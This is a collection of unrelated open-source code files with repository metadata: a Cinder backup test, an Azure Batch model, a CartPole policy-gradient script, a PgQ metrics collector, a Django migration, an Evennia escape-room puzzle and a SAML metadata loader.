self.bak_meta_api._save_vol_base_meta(container, enc_vol1_id)
self.assertRaises(exception.EncryptedBackupOperationFailed,
self.bak_meta_api._restore_vol_base_meta,
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META],
enc_vol2_id, fields)
def test_restore_unencrypted_vol_to_different_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an unencrypted volume
vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'vol_type1',
False)
# Create a second unencrypted volume, of a different volume type
vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'vol_type2',
False)
# Backup the first volume and restore to the second
self.bak_meta_api._save_vol_base_meta(container, vol1_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], vol2_id,
fields)
self.assertNotEqual(
db.volume_get(self.ctxt, vol1_id)['volume_type_id'],
db.volume_get(self.ctxt, vol2_id)['volume_type_id'])
def test_restore_encrypted_vol_to_same_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an encrypted volume
enc_vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Create an encrypted volume of the same type
enc_vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Backup the first volume and restore to the second
self.bak_meta_api._save_vol_base_meta(container, enc_vol1_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], enc_vol2_id,
fields)
def test_restore_encrypted_vol_to_none_type_source_type_unavailable(self):
fields = ['encryption_key_id']
container = {}
enc_vol_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
undef_vol_id = self._create_encrypted_volume_db_entry(
str(uuid.uuid4()), None, False)
self.bak_meta_api._save_vol_base_meta(container, enc_vol_id)
self.assertRaises(exception.EncryptedBackupOperationFailed,
self.bak_meta_api._restore_vol_base_meta,
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META],
undef_vol_id, fields)
def test_restore_encrypted_vol_to_none_type_source_type_available(self):
fields = ['encryption_key_id']
container = {}
db.volume_type_create(self.ctxt, {'id': 'enc_vol_type_id',
'name': 'enc_vol_type'})
enc_vol_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type_id',
True)
undef_vol_id = self._create_encrypted_volume_db_entry(
str(uuid.uuid4()), None, False)
self.bak_meta_api._save_vol_base_meta(container, enc_vol_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], undef_vol_id,
fields)
self.assertEqual(
db.volume_get(self.ctxt, undef_vol_id)['volume_type_id'],
db.volume_get(self.ctxt, enc_vol_id)['volume_type_id'])
def test_filter(self):
metadata = {'a': 1, 'b': 2, 'c': 3}
self.assertEqual(metadata, self.bak_meta_api._filter(metadata, []))
self.assertEqual({'b': 2}, self.bak_meta_api._filter(metadata, ['b']))
self.assertEqual({}, self.bak_meta_api._filter(metadata, ['d']))
self.assertEqual({'a': 1, 'b': 2},
self.bak_meta_api._filter(metadata, ['a', 'b']))
def test_save_vol_glance_meta(self):
container = {}
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
def test_save_vol_meta(self):
container = {}
self.bak_meta_api._save_vol_meta(container, self.volume_id)
def test_save_vol_base_meta(self):
container = {}
self.bak_meta_api._save_vol_base_meta(container, self.volume_id)
def test_is_serializable(self):
data = {'foo': 'bar'}
if self.bak_meta_api._is_serializable(data):
jsonutils.dumps(data)
def test_is_not_serializable(self):
data = {'foo': 'bar'}
with mock.patch.object(jsonutils, 'dumps') as mock_dumps:
mock_dumps.side_effect = TypeError
self.assertFalse(self.bak_meta_api._is_serializable(data))
mock_dumps.assert_called_once_with(data)
| {
"content_hash": "67aafd9b9841c1ea05b8d69230b4f041",
"timestamp": "",
"source": "github",
"line_count": 357,
"max_line_length": 79,
"avg_line_length": 44.37535014005602,
"alnum_prop": 0.5530867314732988,
"repo_name": "nexusriot/cinder",
"id": "95ca2b446ea1ff9b515a10464b1ffd591b703a86",
"size": "16471",
"binary": false,
"copies": "15",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_backup_driver_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13069422"
},
{
"name": "Shell",
"bytes": "8222"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class StartTask(Model):
"""A task which is run when a compute node joins a pool in the Azure Batch
service, or when the compute node is rebooted or reimaged.
:param command_line: The command line of the start task. The command line
does not run under a shell, and therefore cannot take advantage of shell
features such as environment variable expansion. If you want to take
advantage of such features, you should invoke the shell in the command
line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c
MyCommand" in Linux. Required if any other properties of the startTask are
specified.
:type command_line: str
:param resource_files: A list of files that the Batch service will
download to the compute node before running the command line.
:type resource_files: list[~azure.mgmt.batch.models.ResourceFile]
:param environment_settings: A list of environment variable settings for
the start task.
:type environment_settings:
list[~azure.mgmt.batch.models.EnvironmentSetting]
:param user_identity: The user identity under which the start task runs.
If omitted, the task runs as a non-administrative user unique to the task.
:type user_identity: ~azure.mgmt.batch.models.UserIdentity
:param max_task_retry_count: The maximum number of times the task may be
retried. The Batch service retries a task if its exit code is nonzero.
Note that this value specifically controls the number of retries. The
Batch service will try the task once, and may then retry up to this limit.
For example, if the maximum retry count is 3, Batch tries the task up to 4
times (one initial try and 3 retries). If the maximum retry count is 0,
the Batch service does not retry the task. If the maximum retry count is
-1, the Batch service retries the task without limit.
:type max_task_retry_count: int
:param wait_for_success: Whether the Batch service should wait for the
start task to complete successfully (that is, to exit with exit code 0)
before scheduling any tasks on the compute node. If true and the start
task fails on a compute node, the Batch service retries the start task up
to its maximum retry count (maxTaskRetryCount). If the task has still not
completed successfully after all retries, then the Batch service marks the
compute node unusable, and will not schedule tasks to it. This condition
can be detected via the node state and scheduling error detail. If false,
the Batch service will not wait for the start task to complete. In this
case, other tasks can start executing on the compute node while the start
task is still running; and even if the start task fails, new tasks will
continue to be scheduled on the node. The default is false.
:type wait_for_success: bool
"""
_attribute_map = {
'command_line': {'key': 'commandLine', 'type': 'str'},
'resource_files': {'key': 'resourceFiles', 'type': '[ResourceFile]'},
'environment_settings': {'key': 'environmentSettings', 'type': '[EnvironmentSetting]'},
'user_identity': {'key': 'userIdentity', 'type': 'UserIdentity'},
'max_task_retry_count': {'key': 'maxTaskRetryCount', 'type': 'int'},
'wait_for_success': {'key': 'waitForSuccess', 'type': 'bool'},
}
def __init__(self, command_line=None, resource_files=None, environment_settings=None, user_identity=None, max_task_retry_count=None, wait_for_success=None):
super(StartTask, self).__init__()
self.command_line = command_line
self.resource_files = resource_files
self.environment_settings = environment_settings
self.user_identity = user_identity
self.max_task_retry_count = max_task_retry_count
self.wait_for_success = wait_for_success
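# Usage sketch (illustrative values only; the command line and retry count below are
# assumptions, not part of the generated SDK module): build a StartTask that runs a
# shell command on each node and blocks task scheduling until it succeeds.
if __name__ == '__main__':
    example_task = StartTask(
        command_line='/bin/sh -c "echo node ready"',
        wait_for_success=True,
        max_task_retry_count=2,
    )
    print(example_task.command_line)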
| {
"content_hash": "8b049f51ae63a0609488a8b2edc82b6c",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 160,
"avg_line_length": 59.24242424242424,
"alnum_prop": 0.710230179028133,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "fb42d05adbe72b04f93f021acd37fb1179d329fd",
"size": "4384",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-batch/azure/mgmt/batch/models/start_task.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import tensorflow as tf # neural network for function approximation
import gym # environment
import numpy as np # matrix operation and math functions
from gym import wrappers
# GLOBAL SETTINGS
RNG_SEED = 2 # random number generator
ENVIRONMENT = "CartPole-v0"
# ENVIRONMENT = "CartPole-v1"
MAX_EPISODES = 1000
HIDDEN_LAYER = False
HIDDEN_SIZE = 6
DISPLAY_WEIGHTS = False # Help debug weight update
RENDER = True # Render the generation representative
EPISODE_INTERVAL = 100 # Generate a video at this interval
SESSION_FOLDER = "/home/yh/repo/sim_test/Feb/CartPoleData/"
gamma = 0.99 # Discount per step
alpha = 0.02205 # Learning rate
SUCCESS_THRESHOLD = 195
# SUCCESS_THRESHOLD = 475
CONSECUTIVE_TARGET = 100
# def record_interval(n):
# global EPISODE_INTERVAL
# return n % EPISODE_INTERVAL == 0
env = gym.make(ENVIRONMENT)
# env = wrappers.Monitor(env, SESSION_FOLDER)
env.seed(RNG_SEED)
np.random.seed(RNG_SEED)
tf.set_random_seed(RNG_SEED)
input_size = env.observation_space.shape[0]
try:
output_size = env.action_space.shape[0]
except AttributeError:
output_size = env.action_space.n
# Tensorflow network setup
x = tf.placeholder(tf.float32, shape=(None, input_size))
y = tf.placeholder(tf.float32, shape=(None, 1))
expected_returns = tf.placeholder(tf.float32, shape=(None, 1))
w_init = tf.contrib.layers.xavier_initializer()
if HIDDEN_LAYER:
hidden_W = tf.get_variable("W1", shape=[input_size, HIDDEN_SIZE],
initializer=w_init)
hidden_B = tf.Variable(tf.zeros(HIDDEN_SIZE))
dist_W = tf.get_variable("W2", shape=[HIDDEN_SIZE, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
hidden = tf.nn.elu(tf.matmul(x, hidden_W) + hidden_B)
dist = tf.tanh(tf.matmul(hidden, dist_W) + dist_B)
else:
dist_W = tf.get_variable("W1", shape=[input_size, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
dist = tf.tanh(tf.matmul(x, dist_W) + dist_B)
dist_soft = tf.nn.log_softmax(dist)
dist_in = tf.matmul(dist_soft, tf.Variable([[1.], [0.]]))
pi = tf.contrib.distributions.Bernoulli(dist_in)
pi_sample = pi.sample()
log_pi = pi.log_prob(y)
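# Policy-gradient (REINFORCE-style) objective: maximise the log-probability of the
# sampled actions weighted by their discounted return-to-go, i.e. minimise its negative.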
optimizer = tf.train.RMSPropOptimizer(alpha)
train = optimizer.minimize(-1.0 * expected_returns * log_pi)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def run_episode(environment, render=False):
raw_reward = 0
discounted_reward = 0
cumulative_reward = []
discount = 1.0
states = []
actions = []
obs = environment.reset()
done = False
while not done:
states.append(obs)
cumulative_reward.append(discounted_reward)
if render:
            environment.render()  # render the environment; obs is just a numpy array
action = sess.run(pi_sample, feed_dict={x: [obs]})[0]
actions.append(action)
        obs, reward, done, info = environment.step(action[0])
raw_reward += reward
if reward > 0:
discounted_reward += reward * discount
else:
discounted_reward += reward
discount *= gamma
return raw_reward, discounted_reward, cumulative_reward, states, actions
def display_weights(session):
global HIDDEN_LAYER
if HIDDEN_LAYER:
w1 = session.run(hidden_W)
b1 = session.run(hidden_B)
w2 = session.run(dist_W)
b2 = session.run(dist_B)
print(w1, b1, w2, b2)
else:
w1 = session.run(dist_W)
b1 = session.run(dist_B)
print(w1, b1)
returns = []
for ep in range(MAX_EPISODES):
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, RENDER)
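    # Per-step return-to-go: total discounted return minus the reward already
    # accumulated before each step, used as the weight for that step's action.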
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
returns.append(raw_G)
returns = returns[-CONSECUTIVE_TARGET:]
mean_returns = np.mean(returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
| {
"content_hash": "af7a6bd4a86c8cd838f48b9753080a43",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 76,
"avg_line_length": 31.85496183206107,
"alnum_prop": 0.6484543493889289,
"repo_name": "GitYiheng/reinforcement_learning_test",
"id": "1ff2f9e60a161e3b73b6631ebc3d9b3f8a59ef8c",
"size": "4173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test01_cartpendulum/Feb/t2_cartpole_mc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "14810"
},
{
"name": "HTML",
"bytes": "15405"
},
{
"name": "JavaScript",
"bytes": "51050"
},
{
"name": "Jupyter Notebook",
"bytes": "3492256"
},
{
"name": "Python",
"bytes": "1033931"
},
{
"name": "Shell",
"bytes": "3108"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datastore', '0023_auto_20160525_2043'),
]
operations = [
migrations.RemoveField(
model_name='meterrun',
name='meter_type',
),
migrations.RemoveField(
model_name='projectrun',
name='meter_type',
),
migrations.AddField(
model_name='meterrun',
name='meter_class',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AddField(
model_name='meterrun',
name='meter_settings',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
migrations.AddField(
model_name='projectrun',
name='meter_class',
field=models.CharField(default=b'DefaultResidentialMeter', max_length=250, null=True),
),
migrations.AddField(
model_name='projectrun',
name='meter_settings',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
]
| {
"content_hash": "5183b9bdfb26077ec991ff7a13bdfa27",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 98,
"avg_line_length": 29.928571428571427,
"alnum_prop": 0.5767700875099443,
"repo_name": "impactlab/oeem-energy-datastore",
"id": "d40a6de3e4e6e78aa9f21d3fb185f98b1a495ee8",
"size": "1329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "datastore/migrations/0024_auto_20160525_2259.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1722"
},
{
"name": "Python",
"bytes": "218839"
},
{
"name": "Shell",
"bytes": "1348"
}
],
"symlink_target": ""
} |
"""
Collects metrics on queues and queue consumers from PgQ, a PostgreSQL-based
queueing mechanism (part of the Skytools utilities released by Skype.)
#### Dependencies
* psycopg2
#### Example Configuration
```
enabled = True
[instances]
[[database1]]
dsn = postgresql://user:secret@localhost
[[database2]]
dsn = host=localhost port=5432 dbname=mydb
```
"""
try:
import psycopg2
import psycopg2.extras
except ImportError:
psycopg2 = None
import diamond.collector
class PgQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(PgQCollector, self).get_default_config_help()
config_help.update({
"instances": "The databases to be monitored. Each should have a "
"`dsn` attribute, which must be a valid libpq "
"connection string."
})
return config_help
def get_default_config(self):
config = super(PgQCollector, self).get_default_config()
config.update({
'instances': {},
})
return config
def collect(self):
if psycopg2 is None:
self.log.error('Unable to import module psycopg2')
return None
for instance, configuration in self.config['instances'].iteritems():
connection = psycopg2.connect(configuration['dsn'])
connection.set_isolation_level(
psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT,
)
self._collect_for_instance(instance, connection)
def _collect_for_instance(self, instance, connection):
"""Collects metrics for a named connection."""
with connection.cursor() as cursor:
for queue, metrics in self.get_queue_info(instance, cursor):
for name, metric in metrics.items():
self.publish('.'.join((instance, queue, name)), metric)
with connection.cursor() as cursor:
consumers = self.get_consumer_info(instance, cursor)
for queue, consumer, metrics in consumers:
for name, metric in metrics.items():
key_parts = (instance, queue, 'consumers', consumer, name)
self.publish('.'.join(key_parts), metric)
QUEUE_INFO_STATEMENT = """
SELECT
queue_name,
EXTRACT(epoch from ticker_lag),
ev_per_sec
FROM pgq.get_queue_info()
"""
def get_queue_info(self, instance, cursor):
"""Collects metrics for all queues on the connected database."""
cursor.execute(self.QUEUE_INFO_STATEMENT)
for queue_name, ticker_lag, ev_per_sec in cursor:
yield queue_name, {
'ticker_lag': ticker_lag,
'ev_per_sec': ev_per_sec,
}
CONSUMER_INFO_STATEMENT = """
SELECT
queue_name,
consumer_name,
EXTRACT(epoch from lag),
pending_events,
EXTRACT(epoch from last_seen)
FROM pgq.get_consumer_info()
"""
def get_consumer_info(self, instance, cursor):
"""Collects metrics for all consumers on the connected database."""
cursor.execute(self.CONSUMER_INFO_STATEMENT)
for queue_name, consumer_name, lag, pending_events, last_seen in cursor:
yield queue_name, consumer_name, {
'lag': lag,
'pending_events': pending_events,
'last_seen': last_seen,
}
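    # Example of the metric paths this collector publishes (instance, queue and
    # consumer names are hypothetical):
    #   <instance>.<queue>.ticker_lag
    #   <instance>.<queue>.ev_per_sec
    #   <instance>.<queue>.consumers.<consumer>.lag / .pending_events / .last_seen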
| {
"content_hash": "d9d0cfc16bfbb72f29d19766abaefd5a",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 80,
"avg_line_length": 31.684684684684683,
"alnum_prop": 0.5899914700028434,
"repo_name": "tusharmakkar08/Diamond",
"id": "8697c57ecdcd0ff61f3214d9878a3c4d85168070",
"size": "3517",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/collectors/pgq/pgq.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "21681"
},
{
"name": "Makefile",
"bytes": "4465"
},
{
"name": "Python",
"bytes": "1594589"
},
{
"name": "Roff",
"bytes": "23868"
},
{
"name": "Ruby",
"bytes": "230"
},
{
"name": "Shell",
"bytes": "12795"
}
],
"symlink_target": ""
} |
"""
Listening to the monkey automaton to open the closet
"""
import random
from evennia import DefaultScript
from evennia.utils import interactive
from ..state import BaseState
from .. import objects
GREETING = """
This is the situation, {name}:
The |rJester|n wants to win your village's yearly |wpie-eating contest|n.
As it turns out, you are one of her most dangerous opponents.
Today, the day of the contest, she invited you to her small cabin for a
'strategy chat'. But she tricked you and now you are |wlocked in|n! If you
don't get out before the contest starts she'll get to eat all those pies on
her own and surely win!
When you get into the cabin, The monkey-statue 'Vale' has just come alive
and walked over to the door. But he doesn't open it but instead turns around,
waves his long arms in the air and speaks ...
"""
ROOM_DESC = """
The |rJester's cabin|n is actually just a small single room with a *door.
Ample light enters from two *windows on each side. The underside of the sloping
roof is exposed (as are the *rafters holding them up), making the place taller
and feel more spacious than it is.
On the wall opposite the door is a small stone *fireplace, lined to the left
and right side by a tall *closet and an area acting as a *kitchen
respectively. There is also a carver *chair standing around.
Just to the right of the door is the Jester's messy *bed and to the left is
a long, empty-looking *table.
On the floor by the door is a plate on which sits a nicely smelling hintberry *pie.
*Vale has moved to stand just in front of the door, chattering to itself and
waving its arms above its head, excitedly.
"""
# -----------------------------------------------------------
# Vale (by the door, talking)
# ------------------------------------------------------------
STATUE_DESC = """
In front of the door stands a strange little moving statue depicting a strange
animal with a vaguely human-like face but long arms, ears and a tail. It's
dressed in a red jacket and a conical hat. Since hobbling here on its short
legs it has started waving its hands above its head, chattering excitedly to
itself in its strange, squeaky voice.
"""
STATUE_ARMS = """
The arms are made of wood and each joint is made out of wire. But this doesn't
seem to stop the thing from moving around as if it was alive. The finger joints
seem particularly flexible.
"""
STATUE_FACE = """
Vale's painted monkey face is made of wood. It is too big for the body on which
it sits, like a caricature of the animal. The black glass making out the
things' gleaming eyes seem to have been fitted in the face's empty eye sockets
after the face itself was carved.
"""
STATUE_DOOR = """
Vale chatters excitedly.
|w"I can see daylight through the keyhole! You just need to find the key.
Lemme help you out ...
... I saw my Mistress put the key in the cauldron. Just get it from there
and we'll be out into the sunshine in no time!"|n
"""
STATUE_WIND_TURNED = """
Vale, over by the door, seems to sniff the air.
|w"Huh. I think the wind just turned.|n
"""
STATUE_RHYME = """
Vale waggles his tail and weaves his hands in the arms as he recites:
|w"The Magus, the Smith and the Baker were once like glue
- but the Baker had bad pie and then they were only two.
The Magus and the Smith were once loving someone
- but the Smith's heart grew cold and then there was only one.
The Magus had a secret greater than he claimed
- but he drank too much of his wine, ashamed
And then only the Monkey remained."|n
"""
# four numbers are needed, count how many people are in each verse -> 3211. From
# the last verse it's suggested the Monkey was actually always there, so
# add one to the first three verses -> 4321
STATUE_RHYME_NOT_NEEDED = """
Vale looks at you. You swear the wooden face looks amused.
|w"You already figured this out, you know. But if you are so keen to hear my
Mistress' lovely prose again, who am I to refuse?"|n
"""
STATUE_THINK = """
This silly little children's rhyme sounds just like something the Jester would
make up on the spot. This must be a hint to something else though. Maybe some
sort of code?
"""
STATUE_THINK_NOT_NEEDED = """
You already opened the closet by figuring out the rhyme. Surely Vale has served
its purpose now ... or?
"""
STATUE_HINTBERRY_PIE = """
From over by the door, Vale says:
|w"If you get stuck, you can always try eating a hintberry |cpie|w, you know ..."|n
"""
STATUE_RANDOM_CHATTER0 = """
Over by the door, Vale says aloud:
|w"The key to this door is over in the cauldron you know. Just get
it out of there so we can get us some sun!|n
"""
STATUE_RANDOM_CHATTER1 = """
Over by the door, Vale chatters to itself:
|w"I wonder whose face this is, really?|n"
"""
STATUE_RANDOM_CHATTER2 = """
Vale chatters to itself over by the door:
|w"My mistress cannot make herself take anything seriously ...!"|n
Vale quiets, mid-sentence.
"""
STATUE_RANDOM_CHATTER3 = """
Suddenly Vale continues a sentence out of the blue:
|w" ... not even if she wants to! Funny, but also a little sad, eh?"|n
"""
STATUE_RANDOM_CHATTER4 = """
Vale mutters over by the door:
|w"Nice day outside - I can see the sunlight through the keyhole!
Just need to find a key and then we'll be out of here!"|n
"""
STATUE_RANDOM_CHATTER5 = """
Over by the door, the monkey-thing hums contentedly to itself.
"""
STATUE_RANDOM_CHATTER6 = """
Vale talks to itself over by the door:
|w"My mistress had strict instructions for how I was to look, but the
blacksmith already had my face ready. Giving it to me made his heart
lighter, I think ...|n
The thing quiets, as if pondering.
"""
STATUE_RANDOM_CHATTER7 = """
Vale continues after a long pause:
|w"... Hey! I wonder if that was her plan all along."|n
"""
STATUE_RANDOM_CHATTER8 = """
Vale mumbles over by the door:
|w"You should not be too miffed with my Mistress for locking you in here
you know. She just has her .... own way of getting things done."|n
"""
STATUE_RANDOM_CHATTER9 = """
Vale mutters to itself over by the door, its words lost to the world.
"""
STATUE_RANDOM_CHATTERS = [
STATUE_RANDOM_CHATTER0,
STATUE_RANDOM_CHATTER1,
STATUE_RANDOM_CHATTER2,
STATUE_RANDOM_CHATTER3,
STATUE_RANDOM_CHATTER4,
STATUE_RANDOM_CHATTER5,
STATUE_RANDOM_CHATTER6,
STATUE_RANDOM_CHATTER7,
STATUE_RANDOM_CHATTER8,
STATUE_RANDOM_CHATTER9,
]
class StatueValeChatter(DefaultScript):
"""
Makes the statue chatter at random intervals.
"""
def at_script_creation(self):
self.key = "evscaperoom_vale_chatter"
self.start_delay = True
self.interval = 5 * 60
self.persistent = True
self.db.chatter_index = 0
def at_repeat(self):
if self.obj.room.state.name.endswith("state_005_wind_turns"):
# if wind changed, we want that every time
self.obj.room.msg_room(None, STATUE_WIND_TURNED)
elif self.obj.room.state.name.endswith("state_008_open_chest"):
# remind the player about the hintberry pie
self.obj.room.msg_room(None, STATUE_HINTBERRY_PIE.strip())
elif random.random() < 0.3:
# most of the time Vale says nothing on repeat
ind = self.db.chatter_index
if ind > 9:
# start randomize after all have been heard once
chatter = random.choice(STATUE_RANDOM_CHATTERS).strip()
else:
# step through each statement in turn
chatter = STATUE_RANDOM_CHATTERS[ind].strip()
self.db.chatter_index += 1
self.obj.room.msg_room(None, chatter)
class StatueVale(objects.EvscaperoomObject):
def at_object_creation(self):
super().at_object_creation()
self.scripts.add(StatueValeChatter)
self.db.rhyme_needed = True
def at_focus_arms(self, caller, **kwargs):
self.room.score(1, "consider Vale's arms")
self.msg_char(caller, STATUE_ARMS.strip())
def at_focus_face(self, caller, **kwargs):
self.room.score(1, "examine Vale's face")
self.msg_char(caller, STATUE_FACE.strip())
def at_focus_door(self, caller, **kwargs):
self.msg_char(caller, STATUE_DOOR.strip())
def at_focus_think(self, caller, **kwargs):
if self.db.rhyme_needed:
self.msg_char(caller, STATUE_THINK.strip())
else:
self.msg_char(caller, STATUE_THINK_NOT_NEEDED.strip())
def at_focus_rhyme(self, caller, **kwargs):
if self.db.rhyme_needed:
self.msg_char(caller, STATUE_RHYME.strip())
else:
self.msg_char(caller, (STATUE_RHYME_NOT_NEEDED.lstrip() + STATUE_RHYME.rstrip()))
def get_cmd_signatures(self):
txt = ("You might look at Vale's {callsigns}. You can also ask "
"to hear the *rhyme again, ask why he stands by the *door "
"or *think more on this.")
return ["arms", "face"], txt
# ------------------------------------------------------------
# closet
# ------------------------------------------------------------
CLOSET_DESC = """
The 'closet corner' of the cabin is dominated by the namesake closet. It's a
large antique piece of furniture, with double doors of lacquered hardwood.
The thing has a padlock with four spinning wheels on it.
"""
CLOSET_PADLOCK = """
The padlock is a metal construct with four wheels of numbers 0-9 on it. It
looks like you need to rotate these to set a given number.
"""
CLOSET_CODE_CORRECT = """
4,3,2,1 - the number of people mentioned in each of Vale's verses, including
the 'Monkey' that turned out to always be around as well.
The padlock clicks and the metal bar unlocks. But still - the code was just
4321? Seriously? What a stupid code. Typical of the Jester!
The doors to the closet swing open.
"""
class ClosetClosed(objects.CodeInput):
# The closet can now be opened
infinitely_locked = False
code = "4321"
code_hint = "four digits, 0 to 9"
read_flag = None
def at_focus_padlock(self, caller, **kwargs):
self.msg_char(caller, CLOSET_PADLOCK.strip())
@interactive
def at_code_correct(self, caller, code_tried, **kwargs):
self.msg_room(caller, "~You ~enter a code in the *padlock.")
self.room.score(2, "unlock the closet")
self.msg_room(caller, CLOSET_CODE_CORRECT)
yield(2)
self.next_state()
# -----------------------------------------------------------
# State
# ------------------------------------------------------------
STATE_HINT_LVL1 = """
Vale's rhyme tells a story involving a number of people. Maybe you need a code for something?
"""
STATE_HINT_LVL2 = """
The *closet is locked with a lock that requires four digits. The rhyme seems to have four stanzas.
"""
STATE_HINT_LVL3 = """
If you read between the lines, how many people are -actually- in each stanza of the rhyme?
"""
STATE_HINT_LVL4 = """
Enter the code '4321' into the closet lock. The number of people mentioned in each stanza is
3211, but the last line implies that the Monkey was always there without being mentioned
explicitly, so add +1 to the first three values.
"""
class State(BaseState):
next_state = "state_004_childmaker_potion"
hints = [STATE_HINT_LVL1,
STATE_HINT_LVL2,
STATE_HINT_LVL3,
STATE_HINT_LVL4]
def character_enters(self, character):
self.cinematic(GREETING.format(name=character.key),
target=character)
def init(self):
# room desc changed since Vale moved
self.room.db.desc = ROOM_DESC.strip()
# replace statue with one that speaks
statue = self.get_object("statue")
if statue:
statue.delete()
statue = self.create_object(
StatueVale, key="Vale", aliases=['statue', 'monkey'])
statue.db.desc = STATUE_DESC.strip()
closet = self.create_object(
ClosetClosed, key="closet")
closet.db.desc = CLOSET_DESC.strip()
self.room.msg_room(None, STATUE_RHYME.strip())
def clear(self):
super().clear()
self.room.progress(25)
| {
"content_hash": "c9611087af928bc26f859844375d49b9",
"timestamp": "",
"source": "github",
"line_count": 391,
"max_line_length": 98,
"avg_line_length": 31.437340153452684,
"alnum_prop": 0.6548161405792385,
"repo_name": "evennia/evdemo",
"id": "af7677a2ad793fac2262f9eca3d233076dc73cef",
"size": "12292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "evdemo/evscaperoom/states/state_003_locked_closet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "415277"
}
],
"symlink_target": ""
} |
from saml2.config import IdPConfig
from saml2.config import SPConfig
from saml2.mdstore import MetadataStore
__author__ = 'roland'
def load(insecure, conf, md_conf, typ):
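    # If the SP/IdP configuration embeds its own metadata definition, prefer it over
    # the explicitly supplied md_conf and strip it from the config before loading.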
try:
md_conf = conf["metadata"]
del conf["metadata"]
except KeyError:
pass
if typ == 'sp':
_cnf = SPConfig().load(conf)
else:
_cnf = IdPConfig().load(conf)
if insecure:
disable_validation = True
else:
disable_validation = False
mds = MetadataStore(_cnf.attribute_converters, _cnf,
disable_ssl_certificate_validation=disable_validation)
mds.imp(md_conf)
return mds
| {
"content_hash": "acad17b33655caf80e84bb2690c7a37f",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 78,
"avg_line_length": 21.966666666666665,
"alnum_prop": 0.6145675265553869,
"repo_name": "rohe/saml2test2",
"id": "82443216e7b898c7a007d0e2dcddbe7ba96407b9",
"size": "659",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/saml2test/metadata.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "1943"
},
{
"name": "HTML",
"bytes": "17445"
},
{
"name": "JavaScript",
"bytes": "746"
},
{
"name": "Python",
"bytes": "168164"
},
{
"name": "Shell",
"bytes": "126"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('courses', '0006_questions'),
('orders', '0005_product_hola'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='hola',
),
migrations.AddField(
model_name='product',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='courses.Course'),
),
]
| {
"content_hash": "07e2fbf64de6d333ab7849c54c07ef10",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 137,
"avg_line_length": 26.291666666666668,
"alnum_prop": 0.5974643423137876,
"repo_name": "pauljherrera/avantiweb",
"id": "a7b45c022b3f6a6dbef59347fcfeb9c5150077d9",
"size": "704",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orders/migrations/0006_auto_20170421_1555.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "29018"
},
{
"name": "HTML",
"bytes": "144944"
},
{
"name": "JavaScript",
"bytes": "10076"
},
{
"name": "Python",
"bytes": "82419"
}
],
"symlink_target": ""
} |
